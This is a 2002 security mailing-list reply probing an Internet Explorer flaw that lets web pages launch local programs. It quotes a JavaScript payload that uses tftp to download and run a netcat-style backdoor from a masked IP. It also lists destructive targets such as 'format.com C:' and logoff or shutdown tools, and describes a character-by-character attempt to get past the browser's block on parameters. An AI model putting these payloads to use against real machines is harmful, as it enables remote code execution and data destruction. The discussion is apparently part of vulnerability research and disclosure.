Re: Rather large MSIE-hole

[Slow2Show <sl2sho () yahoo com>]

In-Reply-To: <20020313125115.A14918 () castleblack darkflame net>

> I havent tried, since i don't run MS, how about ? 
> var programName=new Array(
> 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET 
ncx99.exe',
> 'c:/winnt/system32/ncx99.exe');

I tried you idea nocon...it seems that the codebase 
will not let you pass any parameters...
so 'C:/WINDOWS/system32/calc.exe' will work 
but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET 
ncx99.exe' will not because of the parameters

I've researched getting this to work by using  unicode 
chars to see if there was something that you could 
put in to bypass this...but alas it wont work…note that 
spaces are allowed in the directory path, but not after 
the program name.

so this would work:
'C:/Program Files/intern~1/IEXPLORER.exe'

but these wont:
'C:/Program Files/intern~1/IEXPLORER.exe -k'
'C:/WINDOWS/system32/format.com C:'

//pseudo code...showing the concept of how I tried 
every Unicode char
for(i=0;i<65535;i++)
     $= unicodeCharAt(i)
     'C:/Program Files/intern~/IEXPLORER.exe$-k'

The only possible attack vector I can see from this is 
if you had prior knowledge to the path of a program 
on a system that you wanted to execute. This is 
slightly dangerous if you are running as admin 
because the telnet server could be started by 
launching 
%SYSTEMROOT%\system32\tlntsess.exe
But you would still need a valid user/pass to gain 
access.(and you should be slapped if you are web 
browsing as admin)

I'm glad this hole turned out to be relatively benign... 
this would have turned into a really dangerous hole 
and not just an annoying one if parameters could be 
passed.

But don't forget that script kiddies could "boot" you 
by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/

if anybody else finds a way of getting the parameters 
to work....please post to the list.

lata,

-Slow2Show-
University of Florida

p.s. see ya @ SANS2002...party Florida style!!